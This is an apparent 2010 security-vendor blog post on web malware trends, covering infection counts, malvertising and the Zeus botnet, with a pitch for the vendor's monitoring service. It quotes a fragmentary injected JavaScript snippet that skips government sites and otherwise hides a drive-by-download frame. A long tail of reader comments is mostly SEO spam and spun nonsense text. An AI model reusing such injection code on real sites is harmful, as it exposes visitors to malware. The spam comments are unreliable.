Monday, May 10, 2010

Q1'10 web-based malware data and trends

Each quarter we pull together data for web-based malware attacks from across the web. Our proprietary malware analysis platform allows us to monitor millions of websites and draw results from a wealth of data which we summarize in this blog. What we continue to see is that the web malware threat continues to grow significantly. Hackers are becoming increasingly sophisticated and bold in their attacks, which means that legitimate websites are more threatened than ever. Putting web site security best practices in place such as malware monitoring and containment is becoming an absolute must if businesses do not want to expose themselves and their customers to these attacks. A particularly interesting observation has been an increase in 'malvertising' attacks in which hackers plant malicious ads on high-profile ad networks and websites. We'll dig deeper into that but first, let's take a look at some of our results:

The Q1 2010 Data

In Q1 2010, we estimate that over 720,000 web sites were infected. While this number is significantly higher than our previous estimate of 560,000 infected web sites during Q4 2009, we also improved our methodology based on new telemetry from scanning a larger number of sites on the Internet and that accounts for infected sites that were previously not included.

This number does not only include small to medium sites getting infected, but also larger, high-profile websites (including Fortune 500 companies). Larger sites are desirable targets because of their high volume of traffic. It's much more convenient for an attacker to compromise an existing site than to try and build web traffic to a site they set up from scratch.

The challenge for websites is that there are many different ways for them to get infected. For example, a site that uses a javascript widget that is hosted externally could be at risk for getting compromised with web-based malware, as discussed in a Google report. Or publishers, blogs and other content providers that use third-party ad networks are at risk of having malvertisements introduced to their users on their site. Many sites (large and small) also rely on third-parties to provide packaged software that powers applications on their website. Examples include content management systems, blogging software, web server software, etc. It is often difficult for websites to constantly keep the software running their site up-to-date and patched to the latest version. Keeping server side web applications up-to-date is just as or even more challenging than keeping client side software up-to-date and patched. Even patched applications have vulnerabilities, which emphasizes the need for malware monitoring to mitigate risk due to both known and unknown vulnerabilities in web applications. In fact, in April there was a mass attack on Wordpress where attackers exploited a vulnerability to infect thousands of websites with malware.

As part of our quarterly malware update, we performed a study of a large pool of websites where we identified the risk factors on those sites that may contribute to malware infections. The results were surprising. We found that 97% of Fortune 500 web sites are at a high risk of getting infected with malware due to external partners (such as javascript widget providers, ad networks, and/or packaged software providers). In fact, Fortune 500 web sites have such a high risk because 69% of them use external Javascript to render portions of their sites and 64% of them are running outdated web applications. (We will be publishing a more in-depth study of malware-specific vulnerabilities on websites in the future.)

On a side note: We launched a new service in Q1 called the Dasient Malware Risk Assessment which allows us to run risk profiles on our customers, giving them information on where they are most exposed to web malware. We obtained the above-mentioned results by running our Malware Risk Assessment on a significant number of industry-specific web sites. If any of you are interested in running such an assessment on your web site, please fill in the form and we'll get you started.

Getting back to our statistics: reinfection rates decreased slightly from 42.4% to 40.5%; although, in general, the probability that a web site will get re-infected is still very high. And, of course, higher re-infection rates mean the site has a higher likelihood of suffering from loss of traffic, a decline in revenue, and damage to brand equity.

The average number of processes that infected web sites start on compromised machines is 3.03 (up from 2.8). Although a little higher than last quarter this is still indicative to us that attackers are getting smarter about the way they structure their attacks, opting for a smaller fingerprint on an infected machine, as historically attackers have started up to a dozen or more new processes on machines they compromise.
23.8% of new processes started due to drive-by-downloads had one character filenames such as “a.exe” or “f.exe”.

Attackers prefer to use “.com” domains to host malware. “.com” was the most popular followed by “.cn”. The domain “” was an attacker site used to infect a relatively large number of sites early in the quarter.

ASP, HTML, and PHP pages were the most infected in that order. The combined number of ASP and PHP pages infected shows an increase in dynamic content being infected this quarter which once again emphasizes the growing complexity in web sites and web applications.

Uptick in Anti-Malvertising attacks in Q1

One of the major trends observed is the spike in malvertising attacks since the beginning of 2010.
While content and feature-rich advertisements have been used on the web for some time, attackers are investing more in using them as a channel to distribute drive-by malware downloads.

Viruses and other malware were found to be lurking in ads on high-profile sites like The New York Times, Drudge, TechCrunch and as well as by big ad delivery platforms such as Yahoo, Fox and Google.

We thought it may be useful to describe how malvertising attacks work, in general. In a typical attack, the hacker signs up to place an ad on a victim ad network (often using a stolen credit card), or compromises the credentials of an existing advertiser on an ad network. If the attacker signs up for a new account with an ad network, the attacker often places a legitimate-looking ad first, and switches it for a malicious ad once the attacker "gains trust" with the ad network. As some ad networks have stricter policies and/or vetting processes around the posting of ads for relatively new advertisers, some attackers simply compromise the login credentials of already existing, legitimate advertisers.

Given that so much of the web is monetized via advertising streams, it is a wonder that malvertising attacks aren't worse than they are, and the malvertising attacks over the past few weeks could be a harbinger of the growing threat to online advertising commerce.

Now that we have discussed high-level trends from the update, let's take a closer look at what the malware does once it is downloaded to a user's PC.

What is the Malware doing?

In many cases, the malware was trying to join a botnet. Botnets are networks of PCs, which have been taken over by malware programs. What the botnet will end up doing depends on what the botnet 'master' wants it to do but usually it will hook processes to capture keystrokes, send email spam etc. Some of the more common mechanisms to conduct drive-by-downloads included taking advantage of Adobe PDF exploits, and encouraging users to click on socially engineered fake AV windows to initiate dangerous downloads. In particular the 'Zeus' botnet has become very widely spread. Netwitness, based in Herndon, VA, released a report highlighting the kind of havoc the malware can wreak. It documents a Zeus botnet that controlled nearly 75,000 computer in more than 2,400 organizations, including some large and reputable ones such as Merck, Juniper Networks and the Hollywood Studio Paramount Pictures. Over four weeks, the botnet was used to steal more than 68,000 log-in credentials, including thousands of Facebook log-ins and Yahoo email log-ins.

Another interesting observation from our research is how attackers interact with government web sites.

Cybercriminals not interested in CyberWar (yet?)

Attackers use automated scripts to query search engines to get lists of vulnerable sites, and then have their scripts automatically infect sites. Their scripts are typically not very discriminating about which sites they attack. Government-run web sites, for instance, are also likely to be attacked by these automated scripts. For example, last month a part of the Environmental Protection Agency's (EPA) web site was infected, and in May the US Treasury had three of its web sites hacked.

It seems, though, that the attackers conducting such attacks are purely in it for the money. One might imagine that inadvertently attacking certain government web sites might provoke a serious (even military) reaction. Hence, while the attackers want to distribute their malware for fun and profit, they want to stay away from starting an all-out cyberwar. Why do we say that? In some of the attacks that we track, we have seen JavaScript code such as the following, which attackers inject:

if (document.location.href.indexOf("gov") >= 0) {
else {
("<div style="'display:none'">");

Basically, the code above says that if the web site attacked is a government web site, then DO NOT serve a malware drive-by-download. Otherwise, it happily generates an invisible frame on the page that pulls in malicious content onto the page which initiates a drive-by-download. What is interesting here is that while an attacker's script may automatically inject the code above into any website, the code is careful not to serve malware to visitors, including government employees, as doing so could be interpreted as an act of cyber-war. What is also interesting that the attackers could decide to launch a cyber-war at any time.


Based on our research, it is evident that the malware epidemic is growing rapidly. With cybercrime techniques getting more sophisticated every day, it is critical to educate businesses on how they can put safe security practices in place for their websites to protect their customers and their revenues. In order to make sure that their businesses are not exposed, web sites can mitigate their risk by monitoring their websites for malware regularly.

If you're a business owner and you'd like to learn more about how Dasient WAM can help protect your websites, head here. If you're a web hosting provider and you'd like to learn about partnership opportunities with Dasient, check out this page. And no matter who you are, please be sure to check out our Twitter feed for all the latest in web-based malware and general security news.

Keep your sites safe!
Your Dasient Team


  1. This comment has been removed by a blog administrator.

  2. Personality for sure gets pandora jewellery raised if you wear few accessories by pandora bracelet with your amazing dressing. Watches, jewelry, glasses pandora bracelets sale and several other accessories if worn pandora charm bracelets with the best attitude, bring a high difference in pandora beads bracelets your overall personality. A trendy and nice watch pandora necklace silver always adds quality to your personality. In earlier new pandora beads days there were not several types and styles discount pandora charms of watches available, but now days it becomes cheap pandora sets very difficult to make a selection between the types and discount pandora sets styles of watches while purchasing it either for a formal wear or for a casual wear.

  3. Are you always vexed about wearing Herve Leger what kind of dress at a banquet?
    Herve Leger bandage dress online store eliminates your worries.
    Ladies who is beautiful and noble may choose Herve Leger bandage
    dress.The dress highlights your perfect feminine body curve.
    If you wear this dress, it will send Herve Leger Blog out your inherent glamour.
    It is specially designed for you and meets your noble taste.
    Wherever you go, you will be the focus. If you haven't a suitable
    dress to attend a banquet and want to 2010 new style buy one now, Herve Leger bandage
    dress online store is your best choice.

  4. Christian Louboutin is a name that every woman should be crazy about. This French man has made a miracle in the fashion circle. After working for many fashion brands, he started his own brand - Christian Louboutin Boots. It is famous for its high heels, all kinds of materials, refined design and especially the red outsole signature, which makes you shining in the crowd. Once you see the red outsole; you don't even have to find the logo and you know it is christian louboutin heels. You can see its sexy and noble charm in every fashion magazine. Many celebrities are fans of Christian Louboutin Flats , including Victoria Becham, Jennifer Lopez, Jennifer Anistion, Christian louboutin Black Lively, etc. It is said that there is a super fan who has owned more than 6000 pairs of Christian Louboutin Sandals. Christian Louboutin himself never pays the super stars endorsement fees, but they are willing to speak for this hot and fashionable brand. It is never exaggerated to say that the Red Carpet is a show for the red outsole. Every woman will wow for its sexy and stylish design. To own a pair of Christian Louboutin Pumps has been many females' dream. Now, you have the chance to own the dreaming red outsole. We provide you with the latest and most fashionable Christian Louboutin shoes , most importantly, the prices are attractive. Take your time to enjoy yourself here

  5. Instead of UGG Boots, Christian Louboutin fur boots are in hot fashion this season. After fur boots restrained themselves for several seasons, fur storm are full-blown in this fall and winter. Such as Channel, Christian shoes D&G and Christian Louboutin shoes and so on, it is easy to find the existence of fur in their products. This year, Christian Louboutin Pumps all the fur products are made in synthetic fur. I think it maybe that these designers are afraid of the strongly condemn of PETA or they have had a high consciousness about protect animals. Christian Louboutin Sandals No matter how these designers consider about this question, the results are a hopeful thing.
    From the ornaments of fox fur on the shoulders to the fur over coat and boots, fur products will give a comfortable enjoyment to people in this cold winter. Christian Louboutin Boots I think no one can stop the contented feeling.
    Matching fur over coats and handbags are still the popular style. Christian Louboutin Flats The great design of many latest style of over coats and boots make the person seems like come from a world of ice and snow of Arctic pole. christian louboutin heels Especially these fur boots are so soft and smooth that it seems that the boots are polar bear’s fur. When you see the latest style of Christian Louboutin Boots, I think you can not help to scream out. christian louboutin specials The beautiful fur matched with the charming splash of red under the boots, how an excellent scene it is!
    Maybe you will be worried about that the too warm fur will make people feel hot-headed. christian louboutin black There is no problem about this item. You can choose a small area of fur clothes and matched with light and thin lace chiffon or a simple sweater and skirt.christian louboutin red The taste of mixed dress up is very high at any time. When you wear a pair of Christian Louboutin fur boots in the winter

  6. Fashion is beautiful, it is popular, personality, is to lead the elements.
    Believe that modern nobody Herve Leger Clothing will miss, so fashionable and not wrong, but we need to create a unique individual glamour, reflect their personality and body, and his unique style, in a herve leger sale word, we should fashion, but we should be more different, suit oneself style is the ultimate fashion and trend ~ ~

  7. Be sure to also look into our The yuletide season ornaments, pandora bracelet hand carved Santa claus dolls, pandora charm and various seasonal treats. The Euro Store is consistently working to provide you with other very good imported solutions from throughout the world, pandora bead like your recent gold jewelry and even silver jewellery collection.Ruby pandora ring jewelry has long not to mention colorful background. pandora necklaces It has influenced artisans and jewelers for centuries to create fabulous and astonishing works of art. Ruby jewelry happens to be discovered out of as far back as the actual Paleolithic Era, silver pandora charms together with was among the initial traded business oriented goods.Designer Jewelry sparkling with by a lot of and has a long romantic back ground.

  8. Moreover, he went on healthcare objective caravans every other 30 days to some of the most non-urban areas of Brazil, offering 100 % free oral treatment to the individuals in the areas he frequented. site

  9. As we age this cautious program changes. Moreover to tracking moment-to-moment risks such as an beginning car or a reduce banister, our risk confirming begins to intuit a remote but gradually nearing black thinking — the nearing end, the greatest border. criminal lawyer

  10. As some ad networks have stricter policies and/or vetting processes around the posting of ads for relatively new advertisers, some attackers simply compromise the login credentials of already existing, legitimate advertisers. Agen Bola

  11. As some ad networks have stricter policies and/or vetting processes around the posting of ads for relatively new advertisers. shemale cams

  12. As a result, some reveals stopped to are available or became much smaller editions of their halcyon times. navigate to this site

  13. Show planners need to keep remain on the innovative of new technological innovation, offer a useful academic component and improve up their promotion outreach to participants. TUBE

  14. Both specialists were respectful, respectful, and very younger — they were both only 22-years-old. Each of them mentioned highly of their career and had very excellent stuff to say about Mr. Rooter. They mentioned with me how water program is a constant career and a excellent way to generate an income. the venus factor review

  15. Spend some time while with a dynamic language and you start to wonder what the benefit of the static type system really is, other then reducing the most gross of mistakes in a project with developers who don't communicate or pay attention. venus factor weight loss

  16. Robichaud also employed Accogliente swan Energy of Louisville, Colo., to set up residential solar sections on Perfection head office to help renew the battery power for eight time in the evening after specialists generate them 120 kilometers during the day. A Ventures

  17. Beamforming techniques are commonly employed in both commercial and army techniques, and are used in ground, viral, and space-based programs. They are ideal for managing several antennas in a program, such as a phased-array mouth aerial.

  18. The efficiency of a beamforming program is usually determined by its program in particular, the aerial range or program with which it will be used. one of Stephen Williams' tactics

  19. Generating highly qualified leads, but there are challenges to maximizing the benefits they offer. For example, designing engaging registration experiences that drive attendance can be costly, it can be time consuming to create. for another point

  20. We are really grateful for your blog post. You will find a lot of approaches after visiting your post. Thanks for such post and please keep it up. as the host suggests

  21. Often it is the surprising lack of way of life of someone near that provides this home; and then the frequency of hospital visits and memorials progressively starts to select up amount, like a drumbeat in the woodlands.

  22. I might have used "lowsomeness" because it's more of a mouthful, more fun to pronounce. But I'll probably find myself using lowness from now on. as seen here

  23. Likewise, if you need some product or set up information, it is often much much better to find your alternatives online than to get in touch with someone and discuss your needs – even if you will continue to perform in the area. with a focus on East Village

  24. But nonetheless, wasn't the whole point of intoducing interest on reserves that the fed could tighten without selling any of the securities it holds Especially since the mortgage bonds might well end up worthless. where you can contact Sam Tabar

  25. But nonetheless, wasn't the whole point of intoducing interest on reserves that the fed could tighten without selling any of the securities it holds? Especially since the mortgage bonds might well end up worthless. hosted by Stansberry and Associates

  26. Stay at the impressive of new technological innovation – make sure you have educational sessions and members introducing considers like geothermal power energy, biomass heat power, etc. Laurene Powell Jobs

  27. One nice aspect about being the first organization to buy the vehicles is that Robichaud is fairly much engaged in any style changes that may be created to your vehicle. FindTheBest

  28. There is no room for the power/charge cord, the oil bottle, or the brush. Because I'm a beginner I first thought "I'll just buy the $[...] one with 10 stitch options because I don't know what all those stitches do anyway, and then if I really get into sewing that's cheap enough that I'll upgrade in a year or two" I'm so glad I didn't do that, I'm still just beginning but I can see how valuable having more stitch options is going to be and I've already started using some of them. bmw repair orange county

  29. Shameless connect here — don’t skip the Fab Five as they existing “The Technological Town Hall” at AHR Jan 28 at 1:00 p.m.I lately taken up with Indicate Halligan, CEO of H+A Worldwide, Chicago, illinois, il, about the very subject of organization events. Indicate has a success of experience with preparing organization events and he has hand to create AHR the effective display that it is nowadays. the truth about cellulite by joey atlas

  30. Often it is the surprising lack of way of life of someone near that provides this home; and then the frequency of hospital visits and memorials progressively starts to select up amount, like a drumbeat in the woodlands. steve holman

  31. I don't know what all those stitches do anyway, and then if I really get into sewing that's cheap enough that I'll upgrade in a year or two" I'm so glad I didn't do that, I'm still just beginning but I can see how valuable having more stitch options is going to be and I've already started using some of them.
    best web hosting
    argan oil for hair
    vitamin c serum
    phoenix seo companies
    san francisco seo firm

  32. Great buy for the price! I received the item in a day or so and I was able to complete a photo project I had been working on! It also shuts the feeding ports when they put enough weight on the ring. old school new body diet

  33. He changed the conscript military with a professional military, started out the entrance to Chinese suppliers, and designed the EPA. additional reading